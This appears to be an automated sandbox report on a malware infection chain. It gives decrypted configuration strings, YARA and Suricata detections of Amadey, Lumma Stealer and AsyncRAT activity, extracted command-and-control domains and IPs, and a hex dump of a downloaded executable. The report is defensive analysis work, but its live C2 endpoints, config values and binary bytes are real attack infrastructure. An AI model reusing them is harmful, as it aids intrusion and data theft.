LSRhBurUqdmn+iZVi/vtys/BrLFwuc/5hQkz5MFZAt2qJFc8QRV8E6jJcjuapfJT4oweDd8J1Dstz2x2g6IV8mT5mApzjom+zZwy0G9Qm6S72xbaz8HZicPNRfDUR0SMg652oet7qMrCa2T5T5lrh3+XDogmC1ofzA2lbWuhOb6LNs0uzjiC/NENspNylQFf1D+odhNDdQQHu91SSZLnouuhb9jErxYvCoW7c5U14xsNPKRAjcONjtPSbhMvIwaApa2/wVSil0bk8dbSLnA6Kx7UBPgls8ec/jhgkHTycXE6U8XoPS+louYxi5EdwvqghzRC/itX+SPBq9pMpN8FWXEgVliWc0ViOwS/okPlCW60cFGU+R0lQbYJDyVDqJBflraw7Hqb7cQS5v2gCgogUQBqD9I7SiYbbqs0GUh/b3Zv+Qt7wKzyEGJNuoRei7uDp1xb5uDNprDkZomqHmiSKc1LggyPY4+rcNLDTEkXPq/cjMI2CzPXEpHARNgMQ/YEzM07I51CLT2Szm7G3z8uIng35vjc24l3AqClQ1dcJHQBIHjEqoqrUGLmjUiFfGuL549Mt6Na3OmoCTb0J+r6S8/sp2l/nX9HqHqAoxA==
Source: 00000039.00000002.2988583690.000000000197A000.00000004.00000020.00020000.00000000.sdmp	String decryptor: GP97vNLr0Wa9AfljI/phz7VBswKUASqgiIZZNodWNIPzI+56yXWuOpvWNTQgDoUgAOskV2wmjD76A2aVNhUQyD92KSnqDXlLV+P47rGl14aHUzYeuCKUXHJvFlkQk8GfPZNKaXZNiDGmKibSepgjoJIIM3/Vc+3s07D2Dmv8Bo2hYGsNeAEVOq3oF0fCL5kPxaUCQE+9cR0dxZoIfy5DlW14E6ZSTfnUegUZ8g8ADtxIu5h+2fL58CwzpUlLdw8kRHvK2JPYQSAXV3IiMTw58KlB34+Nw51yoc05UAGmWcMJPRuU2+p/l1cNkzDepbf1evSE6bARyi/iao6lMUMD6paEM4DxEFckeqpVjs3BIx6A1EcYTcx8NepXiEhp/eqoqoCjHS/jwuMPB8KLFpBK7upxBrI6YtoB+sFqHq9bo62za97eZbIE5lxlsp88UEhUa6rAgiH9QNyqb+pfOX7MpaYBYpFDqizolVMqtQC20H8E6szaut4gjCIOUqUHhBSgFtWjJGR1F6x4RUn8llIW1Bvn6uRNFur5U9N5XYZxRThgmv05Cr+Qb09v+D95XyOJqvUSTWKXzmr1tMNRcNEyT3g74VybkYdRldrU1n3+MmLM7RsivXydzIm4+qzkyH58CXkq8767vS6MX3HvkK+WsPnITsc0iub7sUPhNwTofv8=
Source: 00000039.00000002.2988583690.000000000197A000.00000004.00000020.00020000.00000000.sdmp	String decryptor: null
Source: 00000039.00000002.2988583690.000000000197A000.00000004.00000020.00020000.00000000.sdmp	String decryptor: Default
Source: 57.2.Macromedia.com.40c24a8.2.unpack	String decryptor: 7707
Source: 57.2.Macromedia.com.40c24a8.2.unpack	String decryptor: 159.100.19.137
Source: 57.2.Macromedia.com.40c24a8.2.unpack	String decryptor: 0.5.8
Source: 57.2.Macromedia.com.40c24a8.2.unpack	String decryptor: false
Source: 57.2.Macromedia.com.40c24a8.2.unpack	String decryptor: yBu0GW2G5zAc
Source: 57.2.Macromedia.com.40c24a8.2.unpack	String decryptor: MIIE7DCCAtSgAwIBAgIQAM+os8tD+NpTWChT8JYtyzANBgkqhkiG9w0BAQ0FADAXMRUwEwYDVQQDDAxUcnVzdCBTZXJ2ZXIwIBcNMjUwMTIwMDM1NjA0WhgPOTk5OTEyMzEyMzU5NTlaMBcxFTATBgNVBAMMDFRydXN0IFNlcnZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAJ5FzkhjuI8et+p8G29QDGsZ28VZ1PtKbMZx8FrxkUQoQBU7DXFh8mfgTQUhWgMqctpupDC+UhQxQkedPdHe9SvuAtpKEWUFOQzNQMTy3JEvHv3UZfM9Ib5ICGCQtcqInk73RbEh7QdFBK6wE57zENL9lXy8aEBeJk/elSNvLTJwbpa+lP20hlBuuyBWqvPd4/DinQJIRYSIEPDa3hcefGCbnoTp3dg9jttDM+MXtGEz4OurkP47+nFeHgQe7FkNCi5UHaiwvNs8JR7L1yR7HTPlvSwRtAkC0STJtczRA93If63bYMkaC+1QNHQR+WN3c9MCK6SLbGk4nMfSiG3ybohbKhNoJIcsdyFyOOn6N54eCaEwwNzDlb1qkor0bemYVuaT3ZRG27H6C9R9eqyoHQ4WTppSBIm+MBQ+gimD6XdEUCBcM0qAvrVFEy+mFn8FIhKAng9fgPnd47WWJGosTjsezqxJTVYYhUn2dm/VU3O0sdfzJ8O9dIO4htYIs+X5PMuBP2HyLGDsa+VpEkayYMYGmiHD6wDrO20+Z5BdbGUikNdfKo4goEu3A/HIa7YuzFN70ma9Qb+7P448L3mu8pLbll+0iUNo2rYrJ+7nMjduOTeKdBPPYNBHj57Zdd1MkQaIBhHNQ04qdBZYUhJclvbLlx1nPLSMQI9XL0NoRDXvAgMBAAGjMjAwMB0GA1UdDgQWBBSnnBI6rWXybai+OiRUoM3TzO1xlTAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4ICAQCLFgYyTM5EWEcXb2nZYzeqhuu/lhz0AuSDBoXDWQYuV1CgsKoab0s2yZ1v0jRw77uM1AsLSRhBurUqdmn+iZVi/vtys/BrLFwuc/5hQkz5MFZAt2qJFc8QRV8E6jJcjuapfJT4oweDd8J1Dstz2x2g6IV8mT5mApzjom+zZwy0G9Qm6S72xbaz8HZicPNRfDUR0SMg652oet7qMrCa2T5T5lrh3+XDogmC1ofzA2lbWuhOb6LNs0uzjiC/NENspNylQFf1D+odhNDdQQHu91SSZLnouuhb9jErxYvCoW7c5U14xsNPKRAjcONjtPSbhMvIwaApa2/wVSil0bk8dbSLnA6Kx7UBPgls8ec/jhgkHTycXE6U8XoPS+louYxi5EdwvqghzRC/itX+SPBq9pMpN8FWXEgVliWc0ViOwS/okPlCW60cFGU+R0lQbYJDyVDqJBflraw7Hqb7cQS5v2gCgogUQBqD9I7SiYbbqs0GUh/b3Zv+Qt7wKzyEGJNuoRei7uDp1xb5uDNprDkZomqHmiSKc1LggyPY4+rcNLDTEkXPq/cjMI2CzPXEpHARNgMQ/YEzM07I51CLT2Szm7G3z8uIng35vjc24l3AqClQ1dcJHQBIHjEqoqrUGLmjUiFfGuL549Mt6Na3OmoCTb0J+r6S8/sp2l/nX9HqHqAoxA==
Source: 57.2.Macromedia.com.40c24a8.2.unpack	String decryptor: GP97vNLr0Wa9AfljI/phz7VBswKUASqgiIZZNodWNIPzI+56yXWuOpvWNTQgDoUgAOskV2wmjD76A2aVNhUQyD92KSnqDXlLV+P47rGl14aHUzYeuCKUXHJvFlkQk8GfPZNKaXZNiDGmKibSepgjoJIIM3/Vc+3s07D2Dmv8Bo2hYGsNeAEVOq3oF0fCL5kPxaUCQE+9cR0dxZoIfy5DlW14E6ZSTfnUegUZ8g8ADtxIu5h+2fL58CwzpUlLdw8kRHvK2JPYQSAXV3IiMTw58KlB34+Nw51yoc05UAGmWcMJPRuU2+p/l1cNkzDepbf1evSE6bARyi/iao6lMUMD6paEM4DxEFckeqpVjs3BIx6A1EcYTcx8NepXiEhp/eqoqoCjHS/jwuMPB8KLFpBK7upxBrI6YtoB+sFqHq9bo62za97eZbIE5lxlsp88UEhUa6rAgiH9QNyqb+pfOX7MpaYBYpFDqizolVMqtQC20H8E6szaut4gjCIOUqUHhBSgFtWjJGR1F6x4RUn8llIW1Bvn6uRNFur5U9N5XYZxRThgmv05Cr+Qb09v+D95XyOJqvUSTWKXzmr1tMNRcNEyT3g74VybkYdRldrU1n3+MmLM7RsivXydzIm4+qzkyH58CXkq8767vS6MX3HvkK+WsPnITsc0iub7sUPhNwTofv8=
Source: 57.2.Macromedia.com.40c24a8.2.unpack	String decryptor: false
Source: 57.2.Macromedia.com.40c24a8.2.unpack	String decryptor: null
Source: 57.2.Macromedia.com.40c24a8.2.unpack	String decryptor: false
Source: 57.2.Macromedia.com.40c24a8.2.unpack	String decryptor: Default

Phishing

Yara detected Healer AV Disabler

Source: Yara match

File source: Process Memory Space: TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE PID: 1436, type: MEMORYSTR

Yara detected obfuscated html page

Source: Yara match	File source: C:\Temp\v468GkyBl.hta, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\2C3I1mD9d.hta, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\wucgjnAiS.hta, type: DROPPED
Source: Yara match	File source: C:\Temp\i2GY6vn5L.hta, type: DROPPED

Uses 32bit PE files

Source: DhqvS8pXj8.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: k6Sly2p.exe, 00000007.00000002.2626991613.0000000004854000.00000004.00000800.00020000.00000000.sdmp, k6Sly2p.exe, 00000007.00000002.2626991613.00000000047DB000.00000004.00000800.00020000.00000000.sdmp, k6Sly2p.exe, 00000007.00000002.2833835678.0000000005750000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: k6Sly2p.exe, 00000007.00000002.2626991613.0000000004854000.00000004.00000800.00020000.00000000.sdmp, k6Sly2p.exe, 00000007.00000002.2626991613.00000000047DB000.00000004.00000800.00020000.00000000.sdmp, k6Sly2p.exe, 00000007.00000002.2833835678.0000000005750000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: k6Sly2p.exe, 00000007.00000002.2752047926.0000000004940000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE, 00000017.00000002.2447686748.0000000000692000.00000040.00000001.01000000.00000011.sdmp
Source:	Binary string: protobuf-net.pdb source: k6Sly2p.exe, 00000007.00000002.2752047926.0000000004940000.00000004.08000000.00040000.00000000.sdmp

Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F7DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	8_2_00F7DBBE
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F868EE FindFirstFileW,FindClose,	8_2_00F868EE
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F8698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	8_2_00F8698F
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F7D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	8_2_00F7D076
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F7D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	8_2_00F7D3A9
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F89642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	8_2_00F89642
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F8979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	8_2_00F8979D
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F89B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	8_2_00F89B2B
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F85C97 FindFirstFileW,FindNextFileW,FindClose,	8_2_00F85C97
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Code function: 30_2_00406301 FindFirstFileW,FindClose,	30_2_00406301
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Code function: 30_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	30_2_00406CC7

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49737 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:49738
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49741 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49760 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49784 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49813 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49886 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49913 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2059925 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (paleboreei .biz) : 192.168.2.4:56194 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059926 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (paleboreei .biz in TLS SNI) : 192.168.2.4:49940 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2059926 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (paleboreei .biz in TLS SNI) : 192.168.2.4:49947 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49950 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2059926 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (paleboreei .biz in TLS SNI) : 192.168.2.4:49964 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2059926 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (paleboreei .biz in TLS SNI) : 192.168.2.4:49972 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2059926 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (paleboreei .biz in TLS SNI) : 192.168.2.4:49980 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49981 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2059926 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (paleboreei .biz in TLS SNI) : 192.168.2.4:49995 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2059926 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (paleboreei .biz in TLS SNI) : 192.168.2.4:50020 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50019 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2059926 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (paleboreei .biz in TLS SNI) : 192.168.2.4:50035 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50041 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50061 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2059927 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rebeldettern .com) : 192.168.2.4:52437 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50064 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.2.4:50065 -> 104.21.0.135:443
Source: Network traffic	Suricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.2.4:50066 -> 104.21.0.135:443
Source: Network traffic	Suricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 87.120.113.214:4449 -> 192.168.2.4:50069
Source: Network traffic	Suricata IDS: 2059421 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (impolitewearr .biz) : 192.168.2.4:49474 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059427 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (suggestyuoz .biz) : 192.168.2.4:64582 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059423 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (toppyneedus .biz) : 192.168.2.4:63192 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059425 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (lightdeerysua .biz) : 192.168.2.4:61311 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059771 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (toppyneedus .biz) : 192.168.2.4:63192 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059435 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (affordtempyo .biz) : 192.168.2.4:61066 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059431 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mixedrecipew .biz) : 192.168.2.4:57082 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059429 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (hoursuhouy .biz) : 192.168.2.4:49980 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059433 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (pleasedcfrown .biz) : 192.168.2.4:58531 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.2.4:50070 -> 104.21.0.135:443
Source: Network traffic	Suricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.2.4:50074 -> 104.21.0.135:443
Source: Network traffic	Suricata IDS: 2856121 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M2 : 192.168.2.4:50073 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.2.4:50076 -> 104.21.0.135:443
Source: Network traffic	Suricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.2.4:50072 -> 104.21.0.135:443
Source: Network traffic	Suricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.2.4:50077 -> 104.21.0.135:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50079 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.2.4:50078 -> 104.21.0.135:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49964 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49927 -> 172.67.128.154:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49947 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49947 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49907 -> 172.67.128.154:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49907 -> 172.67.128.154:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50035 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:49976 -> 172.67.128.154:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:50066 -> 104.21.0.135:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50066 -> 104.21.0.135:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49940 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49940 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50078 -> 104.21.0.135:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:50074 -> 104.21.0.135:443
Source: Network traffic	Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.4:50071 -> 104.73.234.102:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50008 -> 172.67.128.154:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49916 -> 172.67.128.154:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49916 -> 172.67.128.154:443
Source: Network traffic	Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:50020 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:50077 -> 104.21.0.135:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:50065 -> 104.21.0.135:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50065 -> 104.21.0.135:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: pleasedcfrown.biz
Source: Malware configuration extractor	URLs: affordtempyo.biz
Source: Malware configuration extractor	URLs: mixedrecipew.biz
Source: Malware configuration extractor	URLs: hoursuhouy.biz
Source: Malware configuration extractor	URLs: suggestyuoz.biz
Source: Malware configuration extractor	URLs: lightdeerysua.biz
Source: Malware configuration extractor	URLs: toppyneedus.biz
Source: Malware configuration extractor	URLs: impolitewearr.biz
Source: Malware configuration extractor	URLs: edcatiofireeu.shop
Source: Malware configuration extractor	IPs: 185.215.113.43
Source: Malware configuration extractor	URLs: wodresomdaymomentum.org
Source: Malware configuration extractor	URLs: wodresomdaymomentum.org

Downloads executable code via HTTP

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Feb 2025 17:17:07 GMTContent-Type: application/octet-streamContent-Length: 2399744Last-Modified: Tue, 11 Feb 2025 14:56:33 GMTConnection: keep-aliveETag: "67ab6521-249e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 21 8e ab 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 94 24 00 00 08 00 00 00 00 00 00 0a b3 24 00 00 20 00 00 00 c0 24 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 25 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c0 b2 24 00 4a 00 00 00 00 c0 24 00 9e 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 24 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 10 93 24 00 00 20 00 00 00 94 24 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 9e 05 00 00 00 c0 24 00 00 06 00 00 00 96 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 24 00 00 02 00 00 00 9c 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 b2 24 00 00 00 00 00 48 00 00 00 02 00 05 00 6c 35 01 00 bc 1c 02 00 03 00 00 00 ae 06 00 06 28 52 03 00 98 60 21 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 28 ee 06 00 06 28 b9 06 00 06 2a 56 72 01 00 00 70 80 01 00 00 04 72 5b 00 00 70 80 02 00 00 04 2a 00 00 1e 02 28 33 00 00 0a 2a de 7e 03 00 00 04 2d 15 72 8d 00 00 70 d0 03 00 00 02 2b 0f 2b 14 2b 19 80 03 00 00 04 7e 03 00 00 04 2a 28 34 00 00 0a 2b ea 6f 35 00 00 0a 2b e5 73 36 00 00 0a 2b e0 1a 7e 04 00 00 04 2a 00 2e 2b 06 80 04 00 00 04 2a 02 2b f7 8a 2b 12 72 c3 00 00 70 7e 04 00 00 04 2b 0d 74 3f 00 00 1b 2a 28 04 00 00 06 2b e7 6f 37 00 00 0a 2b ec 00 1e 02 28 38 00 00 0a 2a 1e 02 28 38 00 00 0a 2a 5e 02 28 38 00 00 0a 02 17 8d 4b 00 00 01 25 16 03 9c 7d 05 00 00 04 2a 3a 02 28 38 00 00 0a 02 03 7d 05 00 00 04 2a 00 3a 02 28 38 00 00 0a 02 03 7d 06 00 00 04 2a 00 5e 02 28 38 00 00 0a 02 17 8d 4c 00 00 01 25 16 03 a2 7d 07 00 00 04 2a 3a 02 28 38 00 00 0a 02 03 7d 07 00 00 04 2a 00 2e 2b 06 7b 07 00 00 04 2a 02 2b f7 1e 02 28 38 00 00 0a 2a 1e 02 28 38 00 00 0a 2a 1e 02 28 33 00 00 0a 2a f2 02 28 33 00 00 